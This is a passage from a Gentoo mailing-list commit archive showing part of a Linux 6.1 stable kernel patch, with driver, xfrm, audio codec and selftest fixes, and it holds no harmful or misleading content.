+ 		    !cfg80211_find_ssid_match(ap, request))
+ 			continue;
+ 
++		if (!is_broadcast_ether_addr(request->bssid) &&
++		    !ether_addr_equal(request->bssid, ap->bssid))
++			continue;
++
+ 		if (!request->n_ssids && ap->multi_bss && !ap->transmitted_bssid)
+ 			continue;
+ 
+diff --git a/net/xfrm/xfrm_interface_core.c b/net/xfrm/xfrm_interface_core.c
+index d71dbe822096a..85501b77f4e37 100644
+--- a/net/xfrm/xfrm_interface_core.c
++++ b/net/xfrm/xfrm_interface_core.c
+@@ -379,8 +379,8 @@ static int xfrmi_rcv_cb(struct sk_buff *skb, int err)
+ 	skb->dev = dev;
+ 
+ 	if (err) {
+-		dev->stats.rx_errors++;
+-		dev->stats.rx_dropped++;
++		DEV_STATS_INC(dev, rx_errors);
++		DEV_STATS_INC(dev, rx_dropped);
+ 
+ 		return 0;
+ 	}
+@@ -425,7 +425,6 @@ static int
+ xfrmi_xmit2(struct sk_buff *skb, struct net_device *dev, struct flowi *fl)
+ {
+ 	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net_device_stats *stats = &xi->dev->stats;
+ 	struct dst_entry *dst = skb_dst(skb);
+ 	unsigned int length = skb->len;
+ 	struct net_device *tdev;
+@@ -464,7 +463,7 @@ xfrmi_xmit2(struct sk_buff *skb, struct net_device *dev, struct flowi *fl)
+ 	tdev = dst->dev;
+ 
+ 	if (tdev == dev) {
+-		stats->collisions++;
++		DEV_STATS_INC(dev, collisions);
+ 		net_warn_ratelimited("%s: Local routing loop detected!\n",
+ 				     dev->name);
+ 		goto tx_err_dst_release;
+@@ -503,13 +502,13 @@ xmit:
+ 	if (net_xmit_eval(err) == 0) {
+ 		dev_sw_netstats_tx_add(dev, 1, length);
+ 	} else {
+-		stats->tx_errors++;
+-		stats->tx_aborted_errors++;
++		DEV_STATS_INC(dev, tx_errors);
++		DEV_STATS_INC(dev, tx_aborted_errors);
+ 	}
+ 
+ 	return 0;
+ tx_err_link_failure:
+-	stats->tx_carrier_errors++;
++	DEV_STATS_INC(dev, tx_carrier_errors);
+ 	dst_link_failure(skb);
+ tx_err_dst_release:
+ 	dst_release(dst);
+@@ -519,7 +518,6 @@ tx_err_dst_release:
+ static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net_device_stats *stats = &xi->dev->stats;
+ 	struct dst_entry *dst = skb_dst(skb);
+ 	struct flowi fl;
+ 	int ret;
+@@ -536,7 +534,7 @@ static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+ 			dst = ip6_route_output(dev_net(dev), NULL, &fl.u.ip6);
+ 			if (dst->error) {
+ 				dst_release(dst);
+-				stats->tx_carrier_errors++;
++				DEV_STATS_INC(dev, tx_carrier_errors);
+ 				goto tx_err;
+ 			}
+ 			skb_dst_set(skb, dst);
+@@ -552,7 +550,7 @@ static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+ 			fl.u.ip4.flowi4_flags |= FLOWI_FLAG_ANYSRC;
+ 			rt = __ip_route_output_key(dev_net(dev), &fl.u.ip4);
+ 			if (IS_ERR(rt)) {
+-				stats->tx_carrier_errors++;
++				DEV_STATS_INC(dev, tx_carrier_errors);
+ 				goto tx_err;
+ 			}
+ 			skb_dst_set(skb, &rt->dst);
+@@ -571,8 +569,8 @@ static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	return NETDEV_TX_OK;
+ 
+ tx_err:
+-	stats->tx_errors++;
+-	stats->tx_dropped++;
++	DEV_STATS_INC(dev, tx_errors);
++	DEV_STATS_INC(dev, tx_dropped);
+ 	kfree_skb(skb);
+ 	return NETDEV_TX_OK;
+ }
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index e65de78cb61bf..e47c670c7e2cd 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -850,7 +850,7 @@ static void xfrm_policy_inexact_list_reinsert(struct net *net,
+ 		struct hlist_node *newpos = NULL;
+ 		bool matches_s, matches_d;
+ 
+-		if (!policy->bydst_reinsert)
++		if (policy->walk.dead || !policy->bydst_reinsert)
+ 			continue;
+ 
+ 		WARN_ON_ONCE(policy->family != family);
+@@ -1255,8 +1255,11 @@ static void xfrm_hash_rebuild(struct work_struct *work)
+ 		struct xfrm_pol_inexact_bin *bin;
+ 		u8 dbits, sbits;
+ 
++		if (policy->walk.dead)
++			continue;
++
+ 		dir = xfrm_policy_id2dir(policy->index);
+-		if (policy->walk.dead || dir >= XFRM_POLICY_MAX)
++		if (dir >= XFRM_POLICY_MAX)
+ 			continue;
+ 
+ 		if ((dir & XFRM_POLICY_MASK) == XFRM_POLICY_OUT) {
+@@ -1371,8 +1374,6 @@ EXPORT_SYMBOL(xfrm_policy_hash_rebuild);
+  * of an absolute inpredictability of ordering of rules. This will not pass. */
+ static u32 xfrm_gen_index(struct net *net, int dir, u32 index)
+ {
+-	static u32 idx_generator;
+-
+ 	for (;;) {
+ 		struct hlist_head *list;
+ 		struct xfrm_policy *p;
+@@ -1380,8 +1381,8 @@ static u32 xfrm_gen_index(struct net *net, int dir, u32 index)
+ 		int found;
+ 
+ 		if (!index) {
+-			idx = (idx_generator | dir);
+-			idx_generator += 8;
++			idx = (net->xfrm.idx_generator | dir);
++			net->xfrm.idx_generator += 8;
+ 		} else {
+ 			idx = index;
+ 			index = 0;
+@@ -1790,9 +1791,11 @@ int xfrm_policy_flush(struct net *net, u8 type, bool task_valid)
+ 
+ again:
+ 	list_for_each_entry(pol, &net->xfrm.policy_all, walk.all) {
++		if (pol->walk.dead)
++			continue;
++
+ 		dir = xfrm_policy_id2dir(pol->index);
+-		if (pol->walk.dead ||
+-		    dir >= XFRM_POLICY_MAX ||
++		if (dir >= XFRM_POLICY_MAX ||
+ 		    pol->type != type)
+ 			continue;
+ 
+@@ -3138,7 +3141,7 @@ no_transform:
+ 	}
+ 
+ 	for (i = 0; i < num_pols; i++)
+-		pols[i]->curlft.use_time = ktime_get_real_seconds();
++		WRITE_ONCE(pols[i]->curlft.use_time, ktime_get_real_seconds());
+ 
+ 	if (num_xfrms < 0) {
+ 		/* Prohibit the flow */
+diff --git a/samples/fprobe/fprobe_example.c b/samples/fprobe/fprobe_example.c
+index e22da8573116e..dd794990ad7ec 100644
+--- a/samples/fprobe/fprobe_example.c
++++ b/samples/fprobe/fprobe_example.c
+@@ -48,7 +48,8 @@ static void show_backtrace(void)
+ 	stack_trace_print(stacks, len, 24);
+ }
+ 
+-static void sample_entry_handler(struct fprobe *fp, unsigned long ip, struct pt_regs *regs)
++static void sample_entry_handler(struct fprobe *fp, unsigned long ip,
++				 struct pt_regs *regs, void *data)
+ {
+ 	if (use_trace)
+ 		/*
+@@ -63,7 +64,8 @@ static void sample_entry_handler(struct fprobe *fp, unsigned long ip, struct pt_
+ 		show_backtrace();
+ }
+ 
+-static void sample_exit_handler(struct fprobe *fp, unsigned long ip, struct pt_regs *regs)
++static void sample_exit_handler(struct fprobe *fp, unsigned long ip, struct pt_regs *regs,
++				void *data)
+ {
+ 	unsigned long rip = instruction_pointer(regs);
+ 
+diff --git a/scripts/kallsyms.c b/scripts/kallsyms.c
+index 80aab2aa72246..ff8cce1757849 100644
+--- a/scripts/kallsyms.c
++++ b/scripts/kallsyms.c
+@@ -602,7 +602,10 @@ static void write_src(void)
+ 	sort_symbols_by_name();
+ 	output_label("kallsyms_seqs_of_names");
+ 	for (i = 0; i < table_cnt; i++)
+-		printf("\t.long\t%u\n", table[i]->seq);
++		printf("\t.byte 0x%02x, 0x%02x, 0x%02x\n",
++			(unsigned char)(table[i]->seq >> 16),
++			(unsigned char)(table[i]->seq >> 8),
++			(unsigned char)(table[i]->seq >> 0));
+ 	printf("\n");
+ 
+ 	output_label("kallsyms_token_table");
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 14e70e2f9c881..0163d4c7fdda8 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -7006,6 +7006,24 @@ static void alc287_fixup_bind_dacs(struct hda_codec *codec,
+ 					0x0); /* Make sure 0x14 was disable */
+ 	}
+ }
++/* Fix the missing verb table of the Headset Mic pin */
++static void alc_fixup_headset_mic(struct hda_codec *codec,
++				   const struct hda_fixup *fix, int action)
++{
++	struct alc_spec *spec = codec->spec;
++	static const struct hda_pintbl pincfgs[] = {
++		{ 0x19, 0x03a1103c },
++		{ }
++	};
++
++	switch (action) {
++	case HDA_FIXUP_ACT_PRE_PROBE:
++		snd_hda_apply_pincfgs(codec, pincfgs);
++		alc_update_coef_idx(codec, 0x45, 0xf<<12 | 1<<10, 5<<12);
++		spec->parse_flags |= HDA_PINCFG_HEADSET_MIC;
++		break;
++	}
++}
+ 
+ 
+ enum {
+@@ -7270,6 +7288,7 @@ enum {
+ 	ALC245_FIXUP_HP_X360_MUTE_LEDS,
+ 	ALC287_FIXUP_THINKPAD_I2S_SPK,
+ 	ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD,
++	ALC2XX_FIXUP_HEADSET_MIC,
+ };
+ 
+ /* A special fixup for Lenovo C940 and Yoga Duet 7;
+@@ -9359,6 +9378,10 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI,
+ 	},
++	[ALC2XX_FIXUP_HEADSET_MIC] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc_fixup_headset_mic,
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+@@ -9626,6 +9649,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x89c6, "Zbook Fury 17 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x89ca, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x89d3, "HP EliteBook 645 G9 (MB 89D2)", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8a20, "HP Laptop 15s-fq5xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8a25, "HP Victus 16-d1xxx (MB 8A25)", ALC245_FIXUP_HP_MUTE_LED_COEFBIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8a78, "HP Dev One", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x103c, 0x8aa0, "HP ProBook 440 G9 (MB 8A9E)", ALC236_FIXUP_HP_GPIO_LED),
+@@ -9694,6 +9718,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1517, "Asus Zenbook UX31A", ALC269VB_FIXUP_ASUS_ZENBOOK_UX31A),
+ 	SND_PCI_QUIRK(0x1043, 0x1573, "ASUS GZ301V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1662, "ASUS GV301QH", ALC294_FIXUP_ASUS_DUAL_SPK),
++	SND_PCI_QUIRK(0x1043, 0x1663, "ASUS GU603ZV", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1683, "ASUS UM3402YAR", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x16b2, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x16e3, "ASUS UX50", ALC269_FIXUP_STEREO_DMIC),
+@@ -10633,6 +10658,8 @@ static const struct snd_hda_pin_quirk alc269_fallback_pin_fixup_tbl[] = {
+ 	SND_HDA_PIN_QUIRK(0x10ec0274, 0x1028, "Dell", ALC274_FIXUP_DELL_AIO_LINEOUT_VERB,
+ 		{0x19, 0x40000000},
+ 		{0x1a, 0x40000000}),
++	SND_HDA_PIN_QUIRK(0x10ec0256, 0x1043, "ASUS", ALC2XX_FIXUP_HEADSET_MIC,
++		{0x19, 0x40000000}),
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/wcd938x-sdw.c b/sound/soc/codecs/wcd938x-sdw.c
+index 9c10200ff34b2..5b5b7c267a616 100644
+--- a/sound/soc/codecs/wcd938x-sdw.c
++++ b/sound/soc/codecs/wcd938x-sdw.c
+@@ -1278,7 +1278,31 @@ static int wcd9380_probe(struct sdw_slave *pdev,
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
+-	return component_add(dev, &wcd938x_sdw_component_ops);
++	ret = component_add(dev, &wcd938x_sdw_component_ops);
++	if (ret)
++		goto err_disable_rpm;
++
++	return 0;
++
++err_disable_rpm:
++	pm_runtime_disable(dev);
++	pm_runtime_set_suspended(dev);
++	pm_runtime_dont_use_autosuspend(dev);
++
++	return ret;
++}
++
++static int wcd9380_remove(struct sdw_slave *pdev)
++{
++	struct device *dev = &pdev->dev;
++
++	component_del(dev, &wcd938x_sdw_component_ops);
++
++	pm_runtime_disable(dev);
++	pm_runtime_set_suspended(dev);
++	pm_runtime_dont_use_autosuspend(dev);
++
++	return 0;
+ }
+ 
+ static const struct sdw_device_id wcd9380_slave_id[] = {
+@@ -1320,6 +1344,7 @@ static const struct dev_pm_ops wcd938x_sdw_pm_ops = {
+ 
+ static struct sdw_driver wcd9380_codec_driver = {
+ 	.probe	= wcd9380_probe,
++	.remove	= wcd9380_remove,
+ 	.ops = &wcd9380_slave_ops,
+ 	.id_table = wcd9380_slave_id,
+ 	.driver = {
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index 2316481c2541b..c3964aa00b288 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -3441,7 +3441,8 @@ static int wcd938x_bind(struct device *dev)
+ 	wcd938x->rxdev = wcd938x_sdw_device_get(wcd938x->rxnode);
+ 	if (!wcd938x->rxdev) {
+ 		dev_err(dev, "could not find slave with matching of node\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto err_unbind;
+ 	}
+ 	wcd938x->sdw_priv[AIF1_PB] = dev_get_drvdata(wcd938x->rxdev);
+ 	wcd938x->sdw_priv[AIF1_PB]->wcd938x = wcd938x;
+@@ -3449,46 +3450,47 @@ static int wcd938x_bind(struct device *dev)
+ 	wcd938x->txdev = wcd938x_sdw_device_get(wcd938x->txnode);
+ 	if (!wcd938x->txdev) {
+ 		dev_err(dev, "could not find txslave with matching of node\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto err_put_rxdev;
+ 	}
+ 	wcd938x->sdw_priv[AIF1_CAP] = dev_get_drvdata(wcd938x->txdev);
+ 	wcd938x->sdw_priv[AIF1_CAP]->wcd938x = wcd938x;
+ 	wcd938x->tx_sdw_dev = dev_to_sdw_dev(wcd938x->txdev);
+-	if (!wcd938x->tx_sdw_dev) {
+-		dev_err(dev, "could not get txslave with matching of dev\n");
+-		return -EINVAL;
+-	}
+ 
+ 	/* As TX is main CSR reg interface, which should not be suspended first.
+ 	 * expicilty add the dependency link */
+ 	if (!device_link_add(wcd938x->rxdev, wcd938x->txdev, DL_FLAG_STATELESS |
+ 			    DL_FLAG_PM_RUNTIME)) {
+ 		dev_err(dev, "could not devlink tx and rx\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto err_put_txdev;
+ 	}
+ 
+ 	if (!device_link_add(dev, wcd938x->txdev, DL_FLAG_STATELESS |
+ 					DL_FLAG_PM_RUNTIME)) {
+ 		dev_err(dev, "could not devlink wcd and tx\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto err_remove_rxtx_link;
+ 	}
+ 
+ 	if (!device_link_add(dev, wcd938x->rxdev, DL_FLAG_STATELESS |
+ 					DL_FLAG_PM_RUNTIME)) {
+ 		dev_err(dev, "could not devlink wcd and rx\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto err_remove_tx_link;
+ 	}
+ 
+ 	wcd938x->regmap = dev_get_regmap(&wcd938x->tx_sdw_dev->dev, NULL);
+ 	if (!wcd938x->regmap) {
+ 		dev_err(dev, "could not get TX device regmap\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto err_remove_rx_link;
+ 	}
+ 
+ 	ret = wcd938x_irq_init(wcd938x, dev);
+ 	if (ret) {
+ 		dev_err(dev, "%s: IRQ init failed: %d\n", __func__, ret);
+-		return ret;
++		goto err_remove_rx_link;
+ 	}
+ 
+ 	wcd938x->sdw_priv[AIF1_PB]->slave_irq = wcd938x->virq;
+@@ -3497,27 +3499,45 @@ static int wcd938x_bind(struct device *dev)
+ 	ret = wcd938x_set_micbias_data(wcd938x);
+ 	if (ret < 0) {
+ 		dev_err(dev, "%s: bad micbias pdata\n", __func__);
+-		return ret;
++		goto err_remove_rx_link;
+ 	}
+ 
+ 	ret = snd_soc_register_component(dev, &soc_codec_dev_wcd938x,
+ 					 wcd938x_dais, ARRAY_SIZE(wcd938x_dais));
+-	if (ret)
++	if (ret) {
+ 		dev_err(dev, "%s: Codec registration failed\n",
+ 				__func__);
++		goto err_remove_rx_link;
++	}
+ 
+-	return ret;
++	return 0;
++
++err_remove_rx_link:
++	device_link_remove(dev, wcd938x->rxdev);
++err_remove_tx_link:
++	device_link_remove(dev, wcd938x->txdev);
++err_remove_rxtx_link:
++	device_link_remove(wcd938x->rxdev, wcd938x->txdev);
++err_put_txdev:
++	put_device(wcd938x->txdev);
++err_put_rxdev:
++	put_device(wcd938x->rxdev);
++err_unbind:
++	component_unbind_all(dev, wcd938x);
+ 
++	return ret;
+ }
+ 
+ static void wcd938x_unbind(struct device *dev)
+ {
+ 	struct wcd938x_priv *wcd938x = dev_get_drvdata(dev);
+ 
++	snd_soc_unregister_component(dev);
+ 	device_link_remove(dev, wcd938x->txdev);
+ 	device_link_remove(dev, wcd938x->rxdev);
+ 	device_link_remove(wcd938x->rxdev, wcd938x->txdev);
+-	snd_soc_unregister_component(dev);
++	put_device(wcd938x->txdev);
++	put_device(wcd938x->rxdev);
+ 	component_unbind_all(dev, wcd938x);
+ }
+ 
+diff --git a/sound/soc/pxa/pxa-ssp.c b/sound/soc/pxa/pxa-ssp.c
+index 430dd446321e5..452f0caf415b9 100644
+--- a/sound/soc/pxa/pxa-ssp.c
++++ b/sound/soc/pxa/pxa-ssp.c
+@@ -779,7 +779,7 @@ static int pxa_ssp_probe(struct snd_soc_dai *dai)
+ 		if (IS_ERR(priv->extclk)) {
+ 			ret = PTR_ERR(priv->extclk);
+ 			if (ret == -EPROBE_DEFER)
+-				return ret;
++				goto err_priv;
+ 
+ 			priv->extclk = NULL;
+ 		}
+diff --git a/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_non_uniq_symbol.tc b/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_non_uniq_symbol.tc
+new file mode 100644
+index 0000000000000..bc9514428dbaf
+--- /dev/null
++++ b/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_non_uniq_symbol.tc
+@@ -0,0 +1,13 @@
++#!/bin/sh
++# SPDX-License-Identifier: GPL-2.0
++# description: Test failure of registering kprobe on non unique symbol
++# requires: kprobe_events
++
++SYMBOL='name_show'
++
++# We skip this test on kernels where SYMBOL is unique or does not exist.
++if [ "$(grep -c -E "[[:alnum:]]+ t ${SYMBOL}" /proc/kallsyms)" -le '1' ]; then
++	exit_unsupported
++fi
++
++! echo "p:test_non_unique ${SYMBOL}" > kprobe_events
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 7b20878a1af59..ea6fc59e9f62f 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -1413,7 +1413,9 @@ chk_rst_nr()
+ 	count=$(get_counter ${ns_tx} "MPTcpExtMPRstTx")
+ 	if [ -z "$count" ]; then
+ 		echo -n "[skip]"
+-	elif [ $count -lt $rst_tx ]; then
++	# accept more rst than expected except if we don't expect any
++	elif { [ $rst_tx -ne 0 ] && [ $count -lt $rst_tx ]; } ||
++	     { [ $rst_tx -eq 0 ] && [ $count -ne 0 ]; }; then
+ 		echo "[fail] got $count MP_RST[s] TX expected $rst_tx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1425,7 +1427,9 @@ chk_rst_nr()
+ 	count=$(get_counter ${ns_rx} "MPTcpExtMPRstRx")
+ 	if [ -z "$count" ]; then
+ 		echo -n "[skip]"
+-	elif [ "$count" -lt "$rst_rx" ]; then
++	# accept more rst than expected except if we don't expect any
++	elif { [ $rst_rx -ne 0 ] && [ $count -lt $rst_rx ]; } ||
++	     { [ $rst_rx -eq 0 ] && [ $count -ne 0 ]; }; then
+ 		echo "[fail] got $count MP_RST[s] RX expected $rst_rx"
+ 		fail_test
+ 		dump_stats=1
+@@ -2259,6 +2263,7 @@ remove_tests()
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 -1 slow
+ 		chk_join_nr 1 1 1
+ 		chk_rm_nr 1 1
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# multiple subflows, remove
+@@ -2270,6 +2275,7 @@ remove_tests()
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 -2 slow
+ 		chk_join_nr 2 2 2
+ 		chk_rm_nr 2 2
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# single address, remove
+@@ -2281,6 +2287,7 @@ remove_tests()
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 1 1
+ 		chk_rm_nr 1 1 invert
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# subflow and signal, remove
+@@ -2293,6 +2300,7 @@ remove_tests()
+ 		chk_join_nr 2 2 2
+ 		chk_add_nr 1 1
+ 		chk_rm_nr 1 1
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# subflows and signal, remove
+@@ -2306,6 +2314,7 @@ remove_tests()
+ 		chk_join_nr 3 3 3
+ 		chk_add_nr 1 1
+ 		chk_rm_nr 2 2
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# addresses remove
+@@ -2319,6 +2328,7 @@ remove_tests()
+ 		chk_join_nr 3 3 3
+ 		chk_add_nr 3 3
+ 		chk_rm_nr 3 3 invert
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# invalid addresses remove
+@@ -2332,6 +2342,7 @@ remove_tests()
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 3 3
+ 		chk_rm_nr 3 1 invert
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# subflows and signal, flush
+@@ -2345,6 +2356,7 @@ remove_tests()
+ 		chk_join_nr 3 3 3
+ 		chk_add_nr 1 1
+ 		chk_rm_nr 1 3 invert simult
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# subflows flush
+@@ -2362,6 +2374,7 @@ remove_tests()
+ 		else
+ 			chk_rm_nr 3 3
+ 		fi
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# addresses flush
+@@ -2375,6 +2388,7 @@ remove_tests()
+ 		chk_join_nr 3 3 3
+ 		chk_add_nr 3 3
+ 		chk_rm_nr 3 3 invert simult
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# invalid addresses flush
+@@ -2388,6 +2402,7 @@ remove_tests()
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 3 3
+ 		chk_rm_nr 3 1 invert
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# remove id 0 subflow
+@@ -2398,6 +2413,7 @@ remove_tests()
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 -9 slow
+ 		chk_join_nr 1 1 1
+ 		chk_rm_nr 1 1
++		chk_rst_nr 0 0
+ 	fi
+ 
+ 	# remove id 0 address
+@@ -2409,6 +2425,7 @@ remove_tests()
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 1 1
+ 		chk_rm_nr 1 1 invert
++		chk_rst_nr 0 0 invert
+ 	fi
+ }
+ 
+diff --git a/tools/testing/selftests/net/openvswitch/openvswitch.sh b/tools/testing/selftests/net/openvswitch/openvswitch.sh
+index 7ce46700a3ae3..52054a09d575c 100755
+--- a/tools/testing/selftests/net/openvswitch/openvswitch.sh
++++ b/tools/testing/selftests/net/openvswitch/openvswitch.sh
+@@ -3,6 +3,8 @@
+ #
+ # OVS kernel module self tests
+ 
++trap ovs_exit_sig EXIT TERM INT ERR
++
+ # Kselftest framework requirement - SKIP code is 4.
+ ksft_skip=4
+ 
+@@ -115,7 +117,7 @@ run_test() {
+ 	fi
+ 
+ 	if python3 ovs-dpctl.py -h 2>&1 | \
+-	     grep "Need to install the python" >/dev/null 2>&1; then
++	     grep -E "Need to (install|upgrade) the python" >/dev/null 2>&1; then
+ 		stdbuf -o0 printf "TEST: %-60s  [PYLIB]\n" "${tdesc}"
+ 		return $ksft_skip
+ 	fi
+diff --git a/tools/testing/selftests/net/openvswitch/ovs-dpctl.py b/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
+index 5d467d1993cb1..e787a1f967b0d 100644
+--- a/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
++++ b/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
+@@ -17,8 +17,10 @@ try:
+     from pyroute2.netlink import nla
+     from pyroute2.netlink.exceptions import NetlinkError
+     from pyroute2.netlink.generic import GenericNetlinkSocket
++    import pyroute2
++
+ except ModuleNotFoundError:
+-    print("Need to install the python pyroute2 package.")
++    print("Need to install the python pyroute2 package >= 0.6.")
+     sys.exit(0)
+ 
+ 
+@@ -280,6 +282,12 @@ def print_ovsdp_full(dp_lookup_rep, ifindex, ndb=NDB()):
+ 
+ 
+ def main(argv):
++    # version check for pyroute2
++    prverscheck = pyroute2.__version__.split(".")
++    if int(prverscheck[0]) == 0 and int(prverscheck[1]) < 6:
++        print("Need to upgrade the python pyroute2 package to >= 0.6.")
++        sys.exit(0)
++
+     parser = argparse.ArgumentParser()
+     parser.add_argument(
+         "-v",
+diff --git a/tools/testing/selftests/netfilter/nft_audit.sh b/tools/testing/selftests/netfilter/nft_audit.sh
+index bb34329e02a7f..5267c88496d51 100755
+--- a/tools/testing/selftests/netfilter/nft_audit.sh
++++ b/tools/testing/selftests/netfilter/nft_audit.sh
+@@ -11,6 +11,12 @@ nft --version >/dev/null 2>&1 || {
+ 	exit $SKIP_RC
+ }
+ 
++# Run everything in a separate network namespace
++[ "${1}" != "run" ] && { unshare -n "${0}" run; exit $?; }
++
++# give other scripts a chance to finish - audit_logread sees all activity
++sleep 1
++
+ logfile=$(mktemp)
+ rulefile=$(mktemp)
+ echo "logging into $logfile"
+diff --git a/tools/testing/selftests/vm/charge_reserved_hugetlb.sh b/tools/testing/selftests/vm/charge_reserved_hugetlb.sh
+index a5cb4b09a46c4..0899019a7fcb4 100644
+--- a/tools/testing/selftests/vm/charge_reserved_hugetlb.sh
++++ b/tools/testing/selftests/vm/charge_reserved_hugetlb.sh
+@@ -25,7 +25,7 @@ if [[ "$1" == "-cgroup-v2" ]]; then
+ fi
+ 
+ if [[ $cgroup2 ]]; then
+-  cgroup_path=$(mount -t cgroup2 | head -1 | awk -e '{print $3}')
++  cgroup_path=$(mount -t cgroup2 | head -1 | awk '{print $3}')
+   if [[ -z "$cgroup_path" ]]; then
+     cgroup_path=/dev/cgroup/memory
+     mount -t cgroup2 none $cgroup_path
+@@ -33,7 +33,7 @@ if [[ $cgroup2 ]]; then
+   fi
+   echo "+hugetlb" >$cgroup_path/cgroup.subtree_control
+ else
+-  cgroup_path=$(mount -t cgroup | grep ",hugetlb" | awk -e '{print $3}')
++  cgroup_path=$(mount -t cgroup | grep ",hugetlb" | awk '{print $3}')
+   if [[ -z "$cgroup_path" ]]; then
+     cgroup_path=/dev/cgroup/memory
+     mount -t cgroup memory,hugetlb $cgroup_path
+diff --git a/tools/testing/selftests/vm/hugetlb_reparenting_test.sh b/tools/testing/selftests/vm/hugetlb_reparenting_test.sh
+index bf2d2a684edfd..14d26075c8635 100644
+--- a/tools/testing/selftests/vm/hugetlb_reparenting_test.sh
++++ b/tools/testing/selftests/vm/hugetlb_reparenting_test.sh
+@@ -20,7 +20,7 @@ fi
+ 
+ 
+ if [[ $cgroup2 ]]; then
+-  CGROUP_ROOT=$(mount -t cgroup2 | head -1 | awk -e '{print $3}')
++  CGROUP_ROOT=$(mount -t cgroup2 | head -1 | awk '{print $3}')
+   if [[ -z "$CGROUP_ROOT" ]]; then
+     CGROUP_ROOT=/dev/cgroup/memory
+     mount -t cgroup2 none $CGROUP_ROOT
+@@ -28,7 +28,7 @@ if [[ $cgroup2 ]]; then
+   fi
+   echo "+hugetlb +memory" >$CGROUP_ROOT/cgroup.subtree_control
+ else
+-  CGROUP_ROOT=$(mount -t cgroup | grep ",hugetlb" | awk -e '{print $3}')
++  CGROUP_ROOT=$(mount -t cgroup | grep ",hugetlb" | awk '{print $3}')
+   if [[ -z "$CGROUP_ROOT" ]]; then
+     CGROUP_ROOT=/dev/cgroup/memory
+     mount -t cgroup memory,hugetlb $CGROUP_ROOT


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-22 22:53 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-22 22:53 UTC (permalink / raw
  To: gentoo-commits

commit:     1b5d19742dd710541a3d5f47e0e9d4aafa829ef7
